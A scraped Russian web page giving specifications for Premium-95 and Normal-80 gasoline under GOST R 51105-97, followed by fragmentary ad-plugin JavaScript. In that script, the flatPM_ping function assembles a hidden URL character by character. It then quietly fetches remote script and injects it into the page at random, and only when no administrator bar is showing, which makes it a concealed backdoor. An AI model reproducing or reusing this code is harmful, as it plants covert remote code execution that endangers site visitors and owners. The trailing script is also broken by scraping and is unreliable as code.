Детонационная стойкость  выражается октановым числом, определяемым по моторному или исследовательскому методу. В марке бензина Аи-95 (Премиум-95) цифрами обозначено октановое число, определенное по исследовательскому методу, т.е. при испытаниях двигателя на частичных нагрузках в условиях городской езды.

Автомобильный бензин Премиум-95 — высокооктановый автомобильный  бензин, выпускаемый по ГОСТ Р 51105-97,   полностью отвечает европейским требованиям, конкурентоспособен на нефтяном рынке и используется, в основном, для зарубежных автомобилей, ввозимых в Россию.   Маркировка бензина «Премиум-95» соответствует европейской маркировке бензина. 

ГОСТ Р 51105-97 «Бензины автомобильные неэтилированные» практически полностью удовлетворяет требованиям на Европейские бензины, изложенные в стандарте EN 228 в редакции до 2000 г. и соответствует эколого-санитарным нормам Евро-2.

Физико-химические и эксплуатационным показатели бензина  Премиум-95 приведены в Табл.1  

Наименование  показателй   Значение  для класса
1 2
1 Октановое число, не менее: по моторному методу 85,0
по исследовательскому методу 95,0
2 Концентрация свинца, г / 1дм3 бензина не более   0,010
3 Концентрация фактических  смол , мг на 100см бензина, не более   5,0
4 Индукционный период бензина, мин. не менее   360
5 Массовая доля серы, % ,не более   0,05
6 Объемная доля бензола ,% не более   5
7 Испытание на медной пластинке   Выдерживает класс 1
8 Внешний вид   Чистый, прозрачный
9 Плотность при 15оС, кг/м3   725-780
10 Давление насыщенных паров бензина, кПа,ДНП  мин. 35 45
мах 70 80
11   Фракционный состав: температура начала перегонки, оС, не ниже 35 35
пределы перегонки, оС, не выше: 10% 75 70
50% 120 115
90% 190 185
конец кипения , оС,  не выше 215 215
доля, остатка  в колбе, %, (пообъему) 2 2
остаток и  потери, % (по объему) 4 4
12 Индекс испаряемости, не более 900 1000

Автомобильный бензин Нормаль-80, выпускаемый по ГОСТ Р 51105-97, предназначен для использования на грузовых автомобилях наряду с бензином АИ-80 и А-76.

Основное отличие в том, что показатель массовой доли серы у бензина Нормаль-80 в два раза меньше, чем у А-76. Меньше в нем и содержания свинца.  В марке бензина АИ-80 цифрами обозначено октановое число, определенное по исследовательскому методу, т.е.

 при испытаниях двигателя на частичных нагрузках в условиях городской езды.  

Автомобильный бензин Нормаль-80, выпускаемый по ГОСТ Р 51105-97,   полностью отвечает требованиям на Европейские бензины, изложенные в стандарте EN 228 в редакции до 2000 г., и удовлетворяет эколого-санитарным нормам Евро-2. 

Физико-химические и эксплуатационным показатели бензина  Нормаль-80 приведены в Табл.1  

  Наименование  показателей Значение  для класса 
1 2
1 Октановое число, не менее: по моторному методу 76,0
по исследовательскому методу 80,0
2 Концентрация свинца, г / 1дм бензина не более 0,010
3 Концентрация фактических  смол , мг на 100см бензина, не более 5,0
4 Индукционный период бензина, мин. не менее 360
5 Массовая доля серы, % ,нс более 0,05
6 Объемная доля бензола ,% не более 5
7 Испытание на медной пластинке Выдерживает, класс 1
8 Внешний вид Чистый, прозрачный
9 Плотность при 15оС, кг/м 700-750
10 Давление насыщенных паров бензина,, кПа , ДНП  мин. 35 45
мах 70 80
11 Фракционный состав:температура начала перегонки, оС, не ниже 35 35
пределы перегонки, оС, не выше: 10% 75 70
50% 120 115
90% 190 185
конец кипения , оС,  не выше 215 215
доля остатка  в колбе, %, (по объему) 2 2
остаток и  потери, % (по объему) 4 4
12 Индекс испаряемости, не более 900 1000

Источник: http://unionmaterials.ru/benziny

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};